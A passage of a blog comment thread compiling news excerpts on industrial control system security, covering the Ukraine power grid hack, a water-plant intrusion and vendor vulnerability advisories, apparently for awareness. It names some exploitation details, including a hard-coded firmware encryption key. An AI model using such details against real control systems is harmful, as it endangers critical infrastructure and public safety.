    Zach Flom, an intelligence analyst at threat intelligence firm Recorded Future and a former US DoD computer network defense analyst, has published a study on the BlackEnergy malware, noting a spike in activity prior to the Ukraine attack that left more than 200,000 people temporarily without power on December 23.

    “In 2014, shortly after being picked up by APT [advanced persistent threat] groups and becoming more modular, we see a large spike in references to the malware and its increasing usage in European countries, namely Ukraine,” Flom notes.

    BlackEnergy has evolved from a “relatively simple” distributed denial-of-service attack tool of early 2007 to a highly capable blob of malware over the last eight years, according to Flom.

    The warning of potential future misuse of BlackEnergy comes days after a US government report concluded that the December 2015 power outage in Ukraine – which affected 225,000 customers – was caused by outside attackers.

    Representatives of the US Department of Homeland Security (DHS), Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) and other US government agencies traveled to Ukraine to collaborate and gain more insight into the attack.

    “The cyber-attack was reportedly synchronized and coordinated, probably following extensive reconnaissance of the victim networks. According to company personnel, the cyber-attacks at each company occurred within 30 minutes of each other and impacted multiple central and regional facilities. During the cyber-attacks, malicious remote operation of the breakers was conducted by multiple external humans using either existing remote administration tools at the operating system level or remote industrial control system (ICS) client software via virtual private network (VPN) connections. The companies believe that the actors acquired legitimate credentials prior to the cyber-attack to facilitate remote access.

    All three companies indicated that the actors wiped some systems by executing the KillDisk malware at the conclusion of the cyber-attack. The KillDisk malware erases selected files on target systems and corrupts the master boot record, rendering systems inoperable.”

    Malware ‘clearly’ behind Ukraine power outage, SANS utility expert says
    Mounting evidence attacks are handiwork of elite Russian hacker team.

  24. Tomi Engdahl says:

    Kim Zetter / Wired:
    Inside the Cunning, Unprecedented Hack of Ukraine’s Power Grid — It was 3:30 p.m. last December 23, and residents of the Ivano-Frankivsk region of Western Ukraine were preparing to end their workday and head home through the cold winter streets. Inside the Prykarpattyaoblenergo control center …

    Inside the Cunning, Unprecedented Hack of Ukraine’s Power Grid

    A Brilliant Plan

    The hackers who struck the power centers in Ukraine—the first confirmed hack to take down a power grid—weren’t opportunists who just happened upon the networks and launched an attack to test their abilities; according to new details from an extensive investigation into the hack, they were skilled and stealthy strategists who carefully planned their assault over many months, first doing reconnaissance to study the networks and siphon operator credentials, then launching a synchronized assault in a well-choreographed dance.

    “It was brilliant,” says Robert M. Lee, who assisted in the investigation. Lee is a former cyber warfare operations officer for the US Air Force and is co-founder of Dragos Security, a critical infrastructure security company. “In terms of sophistication, most people always [focus on the] malware [that’s used in an attack],” he says. “To me what makes sophistication is logistics and planning and operations and … what’s going on during the length of it. And this was highly sophisticated.”

    Ukraine was quick to point the finger at Russia for the assault. Lee shies away from attributing it to any actor but says there are clear delineations between the various phases of the operation that suggest different levels of actors worked on different parts of the assault. This raises the possibility that the attack might have involved collaboration between completely different parties—possibly cybercriminals and nation-state actors.

    “This had to be a well-funded, well-trained team. … [B]ut it didn’t have to be a nation-state,”

    Regardless, the successful assault holds many lessons for power generation plants and distribution centers here in the US, experts say; the control systems in Ukraine were surprisingly more secure than some in the US, since they were well-segmented from the control center business networks with robust firewalls. But in the end they still weren’t secure enough—workers logging remotely into the SCADA network, the Supervisory Control and Data Acquisition network that controlled the grid, weren’t required to use two-factor authentication, which allowed the attackers to hijack their credentials and gain crucial access to systems that controlled the breakers.

  25. Tomi Engdahl says:

    Hackers Modify Water Treatment Parameters By Accident

    Verizon’s RISK security team has revealed details on a data breach they investigated where some hackers (previously tied to hacktivism campaigns) breached a payments application from an unnamed water treatment and supply company [PDF, page 38], and also escalated their access to reach SCADA equipment responsible for the water treatment process. The hackers modified water treatment chemical levels four different times.

    The cause of this intrusion seems to be bad network design, since all equipment was interconnected with each other in a star network design

    Of course, the hackers had no clue what they were modifying. Nobody got poisoned or sick in the end.

    Hackers Modify Water Treatment Parameters by Accident

    A group of hackers, previously involved in various hacktivism campaigns, have accidentally made their way into an ICS/SCADA system installed at a water treatment facility and have altered crucial settings that controlled the amount of chemicals used to treat tap water.

    This strange hacking incident is described in Verizon’s 2016 Data Breach Digest (page 38, Scenario 8), a collection of case studies that the company’s RISK team was brought in to investigate.

    The victim of the hack is a company that Verizon identified under the generic name of Kemuri Water Company (KWC). As the RISK team explains, the company noticed that, for a couple of weeks, its water treatment center was behaving erratically, with chemical values being modified out of the blue.

    Suspecting something was wrong – and something that its IT staff wasn’t able to spot – the company brought in Verizon’s RISK team to investigate.

    irst off, KWC was using extremely outdated computer systems, some of which were running ten-year-old operating systems.

    Additionally, the entire IT network revolved around a single equipment, an AS400 system, which would interconnect the company’s internal IT network and the SCADA systems that managed the water treatment facility (a big no-no in terms of security).

    Even worse, the same AS400 was also exposed to the Internet because it was routing traffic to a Web server where KWC’s customers could check their monthly water bill, their current water consumption level, and even pay bills via a dedicated payments application.

    RISK team discovered that the hackers first breached the system via the Web-accessible payments application, looking for sensitive information about the company’s clients.

    Curious as they were, the hackers accessed the AS400 system, from where they also ended up on the SCADA system and started modifying parameters at random, unknowingly changing water treatment values.

    Secondary security measures allowed KWC to detect abnormalities in the levels of released chemicals, and aborted the hackers’ instructions, but this happened often enough to arouse suspicions that this had to be more than a glitch.

    Data breach digest.
    Scenarios from the field

  26. Tomi Engdahl says:

    Catalin Cimpanu / Softpedia News:
    Verizon study highlights how bad network design, outdated systems, and old operating systems exposed a water treatment plant to inadvertent hacking

    Hackers Modify Water Treatment Parameters by Accident

    A group of hackers, previously involved in various hacktivism campaigns, have accidentally made their way into an ICS/SCADA system installed at a water treatment facility and have altered crucial settings that controlled the amount of chemicals used to treat tap water.

    This strange hacking incident is described in Verizon’s 2016 Data Breach Digest (page 38, Scenario 8), a collection of case studies that the company’s RISK team was brought in to investigate.

    The victim of the hack is a company that Verizon identified under the generic name of Kemuri Water Company (KWC). As the RISK team explains, the company noticed that, for a couple of weeks, its water treatment center was behaving erratically, with chemical values being modified out of the blue.

  27. Tomi Engdahl says:

    Vulnerabilities Found in Siemens SIPROTEC Protection Relays

    Researchers discovered that Siemens’ SIPROTEC protection relays are plagued by a couple of medium severity information disclosure vulnerabilities. Firmware updates have been released by the vendor for some of the affected products.

    The security holes affect SIPROTEC 4 and SIPROTEC Compact devices, which provide protection, control, measurement and automation functions for electrical substations and other applications. The products are deployed worldwide in the energy and other sectors.

    According to advisories published this week by Siemens and ICS-CERT, the integrated web server of the vulnerable products allows an attacker with access to the network to obtain sensitive device information (CVE-2016-4784).

    This flaw affects the EN100 Ethernet modules found in SIPROTEC 4 and SIPROTEC Compact devices, and the Ethernet service interface on Port A of several SIPROTEC Compact models.

    The second vulnerability, which affects only EN100 Ethernet modules, allows an attacker on the network to access a portion of the device’s memory content (CVE-2016-4785). This issue is also related to the integrated web interface.

    ICS-CERT noted that even a low-skilled attacker can exploit the vulnerabilities as long as they can gain access to the network hosting the devices.

    Versions 4.26 and earlier of the firmware running on EN100 Ethernet modules are affected by the vulnerabilities. Siemens has plugged the security holes by updating the firmware to version 4.27.

    This is the second advisory published by ICS-CERT for Siemens SIPROTEC products.

  28. Tomi Engdahl says:

    Vulnerabilities Found in Siemens Power Automation System

    Researchers have discovered two vulnerabilities in Siemens’ SICAM Power Automation System (PAS). The vendor has patched one of the flaws and is currently working on addressing the other one.

    SICAM PAS is an automation system used by energy companies worldwide to operate electrical substations. The Windows-based software product is advertised as scalable, flexible, easy to operate and cost-efficient.

    Researchers at Positive Technologies analyzed the Siemens product and found that it’s plagued by two information disclosure vulnerabilities that can be exploited by a local attacker, ICS-CERT said in an advisory published on Thursday.

    Experts discovered that user passwords are not protected properly, allowing an attacker to reconstruct the information (CVE-2016-5848). The second issue can be exploited by hackers to access sensitive configuration data (CVE-2016-5849).

  29. Tomi Engdahl says:

    Flaws Found in Moxa Factory Automation Products

    Applied Risk, a company that specializes in protecting industrial control systems (ICS), published an advisory this week describing several vulnerabilities found in one of Moxa’s factory automation products.

    The security firm’s researchers have identified various types of flaws in the web interface of Moxa’s ioLogik Ethernet I/O products, which are used in oil and gas, manufacturing, nuclear, and water plants.

    The most serious of the vulnerabilities are related to password management. Experts discovered that an MD5 hash of the password used for authentication is sent to the server in a GET request. Since the information is transmitted over HTTP instead of HTTPS, a man-in-the-middle (MitM) attacker can easily obtain and crack the password.

    “The discovered vulnerabilities can be exploited remotely, but there are some prerequisites to be met. Being in the same network as the devices would make exploitation trivial but it’s not much harder to exploit the vulnerabilities remotely,” Ariciu explained. “It depends on the type of access the attacker has – normally the entry point in a network is not the device that sits in the field.”

    The issues were reported to Moxa on May 26 and they were addressed in ioLogik E1242 on September 30 with the release of firmware version 2.5.

  30. Tomi Engdahl says:

    Know the risks of securing safety systems

    Even if a safety system is isolated and separate from a network, the potential for a cyber attack remains and companies and users need to be vigilant and take necessary precautions.

    One assumption about safety systems is they need to remain isolated from the control system, ensuring nothing will hinder their mission to keep the plant and workers safe.

    If we have learned anything in this cyber-aware world, isolation is not security. That means no matter if safety is separate, integrated or interfaced, there is always a path in.

    In these days of working in open, connected manufacturing enterprises, security threats hover over a facility like a looming blizzard, potentially undercutting the vast ability connected plants have to reduce cost and increase productivity and profitability. Control systems, and just as importantly, the safety system, need to stay secure.

    That means the manufacturer needs to treat its safety systems like any other in a facility and conduct a risk assessment to understand any and all strengths and weaknesses.

    “The risk-assessment process is the same as with a control system in that you have to identify the system and how it interfaces with the rest of the system, which is pretty critical,” said John Cusimano, director of industrial cybersecurity at aeSolutions. “Generally speaking, it is always best practice to treat the safety systems as its own zone and then you perform a risk assessment on that safety zone.”

    While the process control system and the safety system have similarities, there is one major distinction.

    “The biggest difference with a safety system is the consequences,” Cusimano said. “When you do the risk assessment in the safety system zone it comes out at a higher risk, it will change your protection and your decisions on how you are going to secure that zone. It will be a higher level of security and require stronger mitigations. Generally, you are trying to minimize the communications and reduce the attack surface.”

    Safety systems remain a vital cog not just in keeping the plant and people safe, but also enabling successful business performance.

    “The biggest thing users are coming to realize is the attack will most likely come from inside the network than outside,” said Sven Grone, industrial automation turbomachinery control business development at Schneider Electric. “Things like inadvertent viruses on flash drives, contractors coming in with their machines and hooking up to the network to work on gear. These are people you invited into your systems to work on it and you are not controlling their machines and not controlling what they are putting on the network. There is definitely an element of social engineering and having to deal with people’s behavior and operational behavior in the cybersecurity process that is often not nearly as prevalent than doing functional safety.”

    Security whether separate or integrated

    When it comes to securing a safety system, the age-old question of integrated or separate systems continues to rear its ugly head.

    “I am a personal believer in a separate system. The little amount of money you save making it integrated is just the engineering portion of it,” said Nasir Mundh, global director of safety services at Schneider Electric

    No matter the type of system, vigilance remains the key priority.

    “Integrated, interfaced, or separate. There is no right, no wrong, only choice,”

    “We integrate safety and now security becomes an issue—we are seeing a movement back to maintaining as much distance between the control system and safety as possible,” Elliott said. “Thinking about moving toward open standards and connecting everything together, next security is a consideration—solving one problem, creates another.”

  31. Tomi Engdahl says:

    Preparing for a cyber attack
    An incident response (IR) plan is a vital component of cybersecurity strategy.

    What was once an afterthought for oil and gas organizations, cybersecurity is now center stage. Cybersecurity impacts every facet of oil and gas operations, which are now more digital and connected than ever. As such, chief information security officers (CISO) understand that attacks are inevitable, and what counts today is how organizations respond to threats and their overall level of cyber-readiness.

    Cybersecurity has similar traits to physical security. Many people have an alarm system in their house, not to prevent a break-in from occurring, but to immediately alert the house’s occupants, and authorities, when one happens. Further, while everything in a home may have value, the most valuable items are frequently stored in a safe for added protection.

    Organizations are beginning to think about cybersecurity in the same way. As threats become more sophisticated, companies must acknowledge that attacks can’t necessarily be prevented, but fast response time and a secure environment for the most critical data and assets are key to building a strong cybersecurity position.

    Cybersecurity attacks on energy organizations are more targeted than other industries, causing costly damage to operational technology (OT) environments. With an increasing number of connected devices and two very unique operating environments—IT and OT—the oil and gas sector’s greatest challenge is to establish clear and informative guidelines for people and processes during a cyber attack.

    Despite having an incident response (IR) plan in place, very few oil and gas organizations run through full simulation exercises of this plan. Simulated exercises can reveal incorrect assumptions made during the IR process and also alert security leaders to gaping holes

  32. Tomi Engdahl says:

    Nuclear Power Plant Disrupted by Cyber Attack

    The head of an international nuclear energy consortium said this week that a cyber attack caused a “disruption” at a nuclear power plant at some point during the last several years. Yukiya Amano, the head of the International Atomic Energy Agency (IAEA) didn’t go into detail about the attack, but warned about the potential of future attacks, stressing on Monday that the idea of cyber attacks that impact nuclear infrastructure isn’t an “imaginary risk.’

    “This issue of cyber attacks on nuclear-related facilities or activities should be taken very seriously. We never know if we know everything, or if it’s the tip of the iceberg,” Amano told reporters in Germany.

    It’s unclear whether Amano will ever disclose which power plant was affected, or when the attack happened. He told Reuters it occurred “two to three years ago,” and declined to get further into the incident, which was previously unknown.

    “It could be ransomware, malware, a targeted attack; it’s anyone’s guess what it could be,”

  33. Tomi Engdahl says:

    Schneider Electric plugs gaping hole in industrial control kit
    Provider Schneider would’ve had hackers inside ‘er

    A vulnerability in Schneider Electric’s industrial controller management software created a possible mechanism for hackers to plant malicious code on industrial networks.

    Industrial cybersecurity firm Indegy discovered the recently resolved flaw in Schneider Electric’s flagship industrial controller management software, Unity Pro. “The vulnerability in Unity Pro allows any user to remotely execute code directly on any computer on which this product is installed, in debug privileges,” Indegy warned in an advisory.

    “It is good that cybersecurity companies are disclosing these vulnerabilities and following good ethical disclosure practices, but no one should be surprised that such vulnerabilities exist,” Zahn said. “This is tip of the iceberg stuff as most control systems in the field today were designed without cybersecurity as even a consideration.”

    New SCADA Vulnerability Enables Remote Control of ICS Networks

    As part of our ongoing R&D efforts we occasionally discover vulnerabilities in industrial controllers (PLCs, RTUs, DCS etc.) and software tools. Recently, Indegy Labs team discovered a vulnerability in Unity Pro, Schneider Electric’s flagship software application for managing and programing industrial controllers.. Before we get into the specifics, it’s important to point out that unlike in IT networks, a vulnerability is not necessarily required to compromise controllers in an ICS network. That’s because:

    Industrial controllers lack authentication
    Industrial communication protocols lack encryption

    Surprising as it might sound, anyone who has access to the control network, also has unfettered access to all of its industrial controllers. This means that anyone who can ping a controller, can probably send a it stop command or reprogram the device to cause operational disruptions.

    Nonetheless, some vulnerabilities can pose exceptional risk to ICS networks.

    The vulnerability in Unity Pro allows any user to remotely execute code directly on any computer on which this product is installed, in debug privileges. The vulnerable software tool is present in every control network in the world that uses Schneider-Electric controllers. Regardless of the SCADA/DCS applications in use, if Schneider Electric controllers are deployed, this software will be used on the engineering workstations. This makes this attack relevant across virtually any process controlled by these PLCs. Since Schneider Electric is one of the largest industrial control equipment providers, this vulnerability is a major concern.

    Our Recommendations

    The vulnerability in the simulator component of Unity Pro enables attackers to natively access industrial controllers and use a manipulated .apx file to execute malicious code. Since the delivery of the .apx file is an engineering control-plane activity, executed over a proprietary protocol, it is difficult to identify and detect.

    The use of proprietary protocols for control-plane activities is a common yet misunderstood practice in ICS networks. Unlike IT networks where data-plane and control-plane activities are executed over the same communication protocols, in ICS networks different protocols are used for these activities.

    Widely known protocols like MODBUS, PROFINET and DNP3, are all data-plane protocols. However, this is not where dangerous manipulations to ICS/SCADA networks and industrial controllers take place. The control-plane activities, which include all engineering and management activities performed on controllers (PLCs, RTUs) are executed over proprietary, vendor specific protocols which are unnamed, undocumented, and unmonitored.

    To identify such attacks and ensure the integrity of critical control devices, the proprietary control-plane protocols of ICS networks must be monitored.

  34. Tomi Engdahl says:

    Why Monitoring Control Plane Activity is a Requirement for Securing Industrial Networks

    Monitoring network activity is key to securing any production environment. Keeping tabs on the activities of the users, applications and the devices enables operators to ensure expected and normal operations. Monitoring also allows problems to be detected and corrected before damage can occur.

    However, not all networks are created equal. Monitoring industrial control system activity is difficult for two reasons. First, they use different protocols than IT networks. Second, separate protocols are used for performing data-plane and control-plane activities:

    Data-Plane: sometimes referred to as the user plane, carries the user-data traffic. The data-plane is used by the HMI and SCADA applications to communicate process parameters and physical measurements between the human operator and the industrial equipment (I/Os).

    Control Plane: carries the control information. In industrial networks the control-plane activities including all the engineering activity related to the maintenance lifecycle of industrial controllers, such as any read/change of: controller firmware, control-logic, configuration settings, or state. It also includes the administration and operations traffic. [Note that the term ‘control-plane’ is a general networking term, and isn’t related to the control layer of the Purdue Model or controllers in ICS networks]

    The protocols used for data-plane activities, are those used by HMI/SCADA applications to communicate with control-devices. These protocols which include MODBUS, PROFINET, DNP3 and more, are well known and fully documented.

    However, many are unaware of the fact that in ICS networks the control-plane activities use different protocols – a separation that does not exist in IT networks!

    Unlike the data-plane protocols, control-plane protocols are vendor specific proprietary protocols that are mostly unknown, undocumented and often unnamed. This is because they were designed to be used only by the vendor’s engineering software tools. But over the years, other tools that utilize these protocols have been developed and can be used for control-plane activities and changing critical industrial controllers.

  35. Tomi Engdahl says:

    Security Firm Discloses Unpatched Flaws in Schneider HMI Product

    A cybersecurity startup has disclosed a couple of unpatched denial-of-service (DoS) vulnerabilities affecting a human-machine interface (HMI) product from Schneider Electric.

    CRITIFENCE, a company that specializes in security solutions for industrial control systems (ICS), reported on Tuesday that Eran Goldstein, its CTO and founder, in April discovered two serious flaws in Schneider Electric Magelis HMI panels.

  36. Tomi Engdahl says:

    Flaws Found in Moxa Industrial Ethernet Products

    A researcher has discovered a couple of critical and medium severity vulnerabilities affecting various industrial ethernet products from Taiwan-based industrial networking, computing and automation solutions provider Moxa.

    According to an advisory published recently by ICS-CERT, Moxa’s OnCell industrial LTE cellular gateways, AWK wireless AP/bridge/client products, WAC wireless access controllers, and TAP railway wireless units have improper authentication and OS command execution vulnerabilities. The issues were reported to Moxa, through ICS-CERT, by researcher Maxim Rupp.

    The more serious of the issues, tracked as CVE-2016-8363 and assigned a CVSS score of 9.1, allows a malicious user to execute arbitrary OS commands on the affected server.

    The second flaw, identified as CVE-2016-8362, allows a user to download log files by accessing specific URLs.

    Firmware updates that patch these vulnerabilities were released by Moxa on November 1 for OnCell G3470A-LTE and AWK-1131A/3131A/4131A products. Firmware updates for some of the other devices are expected to become available in May and June 2017.

  37. Tomi Engdahl says:

    Privilege Escalation Flaw Affects Several Siemens Products

    Siemens has released updates and temporary fixes to address a medium-severity privilege escalation vulnerability affecting many of its industrial products.

    Organizations have been warned that users with local access to the Windows operating system running on the same device as affected Siemens applications can escalate their privileges if certain conditions are met.

    “Unquoted service paths could allow local Microsoft Windows operating system users to escalate their privileges if the affected products are not installed under their default path (“C:\Program Files\*” or the localized equivalent),” Siemens and ICS-CERT wrote in advisories published this week.

    The vulnerability, tracked as CVE-2016-7165, cannot be exploited if the impacted product is installed in the default path or the localized equivalent.

    The security hole affects several Siemens SCADA systems, distributed control systems (DCS), engineering tools, and simulators, including SIMATIC, SINEMA, TeleControl, SOFTNET, SIMIT, Security Configuration Tool (SCT) and Primary Setup Tool (PST) products.

    Advisory (ICSA-16-313-02)
    Siemens Industrial Products Local Privilege Escalation Vulnerability

    High severity flaws in Phoenix Contact inline controllers

    ICS-CERT also published an advisory this week to warn users about high severity flaws affecting inline controllers manufactured by Phoenix Contact, a Germany-based automation company.

    Advisory (ICSA-16-313-01)
    Phoenix Contact ILC PLC Authentication Vulnerabilities

  38. Tomi Engdahl says:

    Experts Propose Cybersecurity Strategy for Nuclear Facilities

    Institutionalizing cybersecurity, reducing complexity, active defenses and transformative research should be a priority in reducing the risk of damaging cyberattacks at nuclear facilities, according to the Nuclear Threat Initiative (NTI).

    While the Stuxnet attacks aimed at Iran are the most well-known, nuclear facilities in Germany and South Korea have also been hit by cyberattacks. European Union officials have also raised concerns about the possibility of attacks against Belgium’s nuclear plants.

    Reports published in the past months warned that countries are not prepared to handle attacks targeting their nuclear facilities, and the nuclear industry still underestimates cyber security risk.

    A report published on Wednesday by the NTI provides a set of recommendations for improving cyber security at nuclear facilities based on a 12-month analysis conducted by an international group of technical and operational experts.

    One of the most important priorities involves institutionalizing cybersecurity. Specifically, nuclear facilities should learn from their safety and physical security programs and integrate these practices into their cybersecurity programs.

    Another priority should be active defenses. Experts pointed out that a determined adversary will likely be capable of breaching the systems of a nuclear facility and organizations must be prepared to efficiently respond to such incidents.

    Reducing the complexity of digital systems should also be a priority for nuclear facilities. Experts recommend minimizing the complexity of digital systems and even replacing them with non-digital or secure-by-design products.

    Finally, the NTI recommends conducting transformative research with the goal of developing hard-to-hack systems for critical applications.

    “Today’s defenses are no longer adequate, and a fresh look at how to best protect nuclear facilities from cyberattack is needed,” experts wrote in the NTI report. “The threat is too great, and the potential consequences are too high, to remain comfortable with the status quo.”

  39. Tomi Engdahl says:

    IBM Reports Significant Increase in ICS Attacks

    The number of attacks aimed at industrial control systems (ICS) increased by 110 percent in 2016 compared to the previous year, according to data from IBM Managed Security Services.

    The company has attributed this significant increase to brute force attacks on supervisory control and data acquisition (SCADA) systems.

    Attackers apparently used a penetration testing framework made available on GitHub in January 2016. The tool, named smod, can be used to conduct a security assessment of the Modbus serial communications protocol and it includes brute-force capabilities.

    “The public release and subsequent use of this tool by various unknown actors likely led to the rise in malicious activity against ICS in the past 12 months,”

    MODBUS Penetration Testing Framework

    smod is a modular framework with every kind of diagnostic and offensive feature you could need in order to pentest modbus protocol. It is a full Modbus protocol implementation using Python and Scapy. This software could be run on Linux/OSX under python 2.7.x.

  40. Tomi Engdahl says:

    Schneider Electric Patches Flaws in ClearSCADA, Wonderware Products

    Schneider Electric has released patches to address critical and high severity vulnerabilities in its StruxureWare SCADA Expert ClearSCADA and Wonderware Intelligence products, ICS-CERT informed organizations last week.

    According to advisories released by both ICS-CERT and Schneider Electric, the ClearSCADA product is affected by a high severity flaw (CVE-2017-6021) that allows an attacker on the network to crash the ClearSCADA server process and communications driver by sending a specially crafted request.

    The security hole, discovered by researchers at Kaspersky Lab, affects all supported versions of the SCADA product, including ClearSCADA 2014 R1 (build 75.5210), 2014 R1.1 (build 75.5387), 2015 R1 (build 76.5648) and 2015 R2 (build 77.5882).

  41. Tomi Engdahl says:

    Malware ‘disguised as Siemens firmware drills into 10 industrial plants’
    Four years of active infection, claims security biz Dragos

    Malware posing as legitimate firmware for Siemens control gear has apparently infected industrial equipment worldwide over the past four years.

    The cyber-nasty is packaged as software to be installed on Siemens programmable logic controllers (PLC), we’re told. At least 10 industrial plants – seven in the US – were found running the infected firmware, a study by industrial cybersecurity firm Dragos claims.

    Project MIMICS – Stage One

  42. Tomi Engdahl says:

    High Severity Flaws Patched in Rockwell Automation Tools

    High severity vulnerabilities have been patched by Rockwell Automation in the company’s Connected Components Workbench and FactoryTalk Activation tools, ICS-CERT said on Wednesday.

    One of the flaws, discovered by researcher Ivan Sanchez and tracked as CVE-2017-5176, affects Connected Components Workbench (CCW), a design and configuration application for Rockwell devices. The product is used worldwide in various industries.

  43. Tomi Engdahl says:

    Schneider Electric still shipping passwords in firmware
    You’d think a vendor of critical infrastructure would at least pretend to care about security

    That “don’t use hard-coded passwords” infosec rule? Someone needs to use a needle to write it on the corner of Schneider Electric’s developers’ eyes so they don’t forget it.

    Yes, it’s happened again, this time on the SCADA vendor’s Schneider Modicon TM221CE16R, Firmware – and without new firmware, users are stuck, because they can’t change the password.

    It’s a real Friday-afternoon-special: someone encrypted the user/password XML file with the fixed key “SoMachineBasicSoMachineBasicSoMa”.

    That means an attacker can open the control environment (SoMachine Basic 1.4 SP1), get and decrypt the user file, and take over.

  44. Tomi Engdahl says:

    World Close to ‘Serious Digital Sabotage’: Dutch Spy Chief

    The world may be close to a “serious act of digital sabotage” which could trigger unrest, “chaos and disorder,” Dutch spy chief Rob Bertholee warned Tuesday.

    Sabotage of critical infrastructure “is the kind of thing that might keep you awake at night,” Bertholee told a timely cyber security conference in The Hague, as global experts grapple with the fallout of a massive cyberattack over the past days.

    Digital threats “are not imaginary, they are everywhere around us,” the head of the country’s intelligence services (AIVD) told the conference organised by the Dutch government.

    “In my opinion, we might be closer to a serious act of digital sabotage than a lot of people can imagine,” he told hundreds of experts and officials.

    The world’s infrastructure was heavily interconnected, which had huge benefits, but also “vulnerabilities”.

    “Imagine what would happen if the entire banking system were sabotaged for a day, two days, for a week,” he asked.

    “Or if there was a breakdown in our transportation network. Or if air traffic controllers faced cyberattacks while directing flights. The consequences could be catastrophic.”

    Added Bertholee: “Sabotage on one of these sectors could have major public repercussions, causing unrest, chaos and disorder.”

    The threat of “cyber terrorism” from terror groups such as the so-called Islamic State jihadist and Al-Qaeda was still limited, he said, but “jihadist-inspired terrorism is the number one priority” of the Dutch intelligence services.

    “The level of technical expertise available to a jihadist group is still insufficient to inflict significant damage or personal injury through digital sabotage,” Bertholee said.

    “They may not yet have the capability but they definitely have the intent,” he warned.

  45. Tomi Engdahl says:

    ICS Environments: Insecure by Design

    ndustrial Control System Design Flaws Have a Profound Impact on Security Posture of Operational Networks

    It’s a generally known fact that most Industrial Control System (ICS) environments were not built with cyber security in mind because they were designed before the cyber threat existed. For decades these networks were protected by an air-gap, disconnected from the outside world. With the introduction of commercial off the shelf (COTS) technology in the 1990s (which replaced proprietary, purpose-built industrial hardware and software) and the increasing connectivity to corporate networks and the Internet, these systems have become more exposed to cyber threats and the risk of compromise.

    The impact of vulnerabilities and design flaws

    Like IT networks, ICS environments are susceptible to software and hardware vulnerabilities. In recent years there has been a significant increase in the number of ICS vulnerabilities reported.

    ICS networks have become easy targets because they lack basic security controls such as authentication, and do not support encrypted communication. In IT security terms, this represents a major design flaw that adversely impacts the overall security of the ICS environment. This means that anyone with network access can make changes to controller logic and configuration which can severely affect operations and have a catastrophic impact on plant safety and reliability.

    Visibility and control in ICS networks

    ICS networks suffer from a lack of visibility which prevents engineering and security staff from identifying a malicious actor compromising critical assets, or a contractor that may be making an unauthorized change to the configuration of a controller. Not knowing with certainty what’s happening in these networks severely impacts the staff’s ability to detect and respond to incidents, whether caused by cyber threats or human error.

    As long as security controls aren’t available to prevent unauthorized/malicious changes, the design flaws of ICS will continue to affect their security posture and put them at a high risk of compromise. No amount of vulnerability remediation can prevent access to the controllers on ICS networks or mitigate the risk of compromise resulting from a lack of security controls.

  46. Tomi Engdahl says:

    High Severity Flaws Patched in Trihedral SCADA Software

    An update released by Trihedral for its VTScada product patches several vulnerabilities, including high severity weaknesses that can be exploited even by less skilled hackers.

    VTScada, Trihedral’s flagship product, is a software suite designed for creating human-machine interfaces (HMI) for supervisory control and data acquisition (SCADA) systems. The product is used in various industries, mainly in North America and Europe.

    Security researcher Karn Ganeshen discovered several vulnerabilities affecting VTScada versions prior to 11.2.26. The expert told SecurityWeek that a Shodan search showed a few systems running VTScada accessible from the Internet, but he believes there are more vulnerable instances that are exposed to attacks.

    In an advisory published on his website, Ganeshen said an attacker with a non-privileged account can cause excessive CPU and RAM usage by submitting a large payload (up to roughly 80,000 characters) in the username field of the login window.

  47. Tomi Engdahl says:

    [ICS] Trihedral VTScada Multiple Vulnerabilities

    ICS-CERT published an advisory on one of my reports this week –

  48. Tomi Engdahl says:

    Intel AMT bug bit Siemens industrial PCs
    Patches issued for 38 products, plus bonus Web portal bug-fix

    You don’t need state-sponsored hackers to crack industrial control systems, just an empty Intel AMT login – something Siemens started patching against last week.

    The bug in Intel’s Active Management Technology emerged in June. It allowed a user to exploit AMT features with an empty login string, and has been shipping in processors since 2010.

    In Siemens’s case, 38 product series use vulnerable Intel chipsets (the company lists them in this PDF). They include SIMATIC industrial PCs, SINUMERIK control panels and SIMOTION P320 PCs.

    The company has shipped patches for the SIMATIC PCs, but is still working on the control panel products.

  49. Tomi Engdahl says:

    Flaw in Siemens RTU Allows Remote Code Execution

    Potentially serious vulnerabilities have been found in some Siemens SICAM remote terminal unit (RTU) modules, but patches will not be released as the product has been discontinued.

    Researchers at IT security services and consulting company SEC Consult discovered the flaws in the SICAM RTU SM-2556 COM modules, which can be attached to SICAM 1703 and RTU substation controllers for LAN/WAN communications. The product is used worldwide in the energy and other sectors.

    The most serious of the security holes is CVE-2017-12739, a critical vulnerability in the integrated web server that allows an unauthenticated attacker with network access to remotely execute code on affected devices.

    The vulnerabilities affect devices running firmware versions ENOS00, ERAC00, ETA2, ETLS00, MODi00 and DNPi00. Since the product has been discontinued, Siemens has decided not to release patches. However, users can prevent potential attacks by disabling the affected web server, which is designed for diagnostics and is not needed for normal operation.

    In its own advisory, SEC Consult said it reported the vulnerabilities to Siemens in late September. According to the company, the GoAhead webserver used by the RTU module was released in October 2003 and it’s affected by several known vulnerabilities.


Leave a Comment

Your email address will not be published. Required fields are marked *